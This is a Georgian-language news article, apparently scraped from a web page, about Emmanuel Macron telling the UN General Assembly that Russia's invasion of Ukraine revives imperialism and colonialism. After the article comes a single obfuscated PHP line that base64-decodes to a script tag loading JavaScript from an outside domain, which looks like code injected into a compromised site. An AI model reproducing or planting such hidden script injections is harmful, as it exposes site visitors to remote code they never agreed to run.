celsiusi
ავერსი საქკაბელი
საფრანგეთის პრეზიდენტი ემანუელ მაკრონი რუსეთს თანამედროვე იმპერიალიზმში ადანაშაულებს. ემანუელ მაკრონმა გაერო-ს გენერალურ ასამბლეაზე სიტყვით გამოსვლისას აღნიშნა, რომ იმპერიალიზმი ჯუნგლების კანონს ეფუძნებოდა.
 
საფრანგეთის პრეზიდენტის განცხადებით, უკრაინაში რუსეთის შეჭრამ მსოფლიო გაყო და კოლონიების დრო დააბრუნა. მაკრონმა ნეიტრალურ ქვეყნებს მოუწოდა, შეცვალონ პოზიცია უკრაინაში რუსეთის შეჭრასთან დაკავშირებით.
 
„რასაც ჩვენ ვხედავთ 24 თებერვლიდან, არის დაბრუნება იმპერიალიზმისა და კოლონიების ეპოქაში. საფრანგეთი ამას უარყოფს. ეს მემკვიდრეობა, ჩვენი ორგანიზაცია, ისევე, როგორც ჩვენი არჩევანი, როგორც ერების, ალტერნატივის წინაშე დგას. დღეს ჩვენ გვჭირდება მარტივი არჩევანის გაკეთება, ძირითადად ომსა თუ მშვიდობას შორის. მიმდინარე წლის 24 თებერვალს რუსეთმა, უსაფრთხოების საბჭოს მუდმივმა წევრმა, აგრესიის აქტით, შეჭრით, ანექსიით დაარღვია ჩვენი კოლექტიური უსაფრთხოება. მან განზრახ დაარღვია გაერო-ს წესდება და სახელმწიფოთა სუვერენული თანასწორობის პრინციპები. არის ერთი რამ, როდესაც მე გესაუბრებით, უკრაინაში არის რუსული ჯარები და რამდენადაც ვიცი, რუსეთში უკრაინული ჯარები არ არიან. ეს არის ფაქტის განცხადება. რუსეთმა ახლა უნდა დაინახოს, რომ მას არ შეუძლია, სამხედრო გზით დააწესოს თავისი ნება, მაშინაც კი, თუ იქნება ყალბი რეფერენდუმი იმ ტერიტორიებზე, რომლებიც დაბომბა და ახლა ოკუპირებულია“, – აღნიშნა ემანუელ მაკრონმა.
379
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");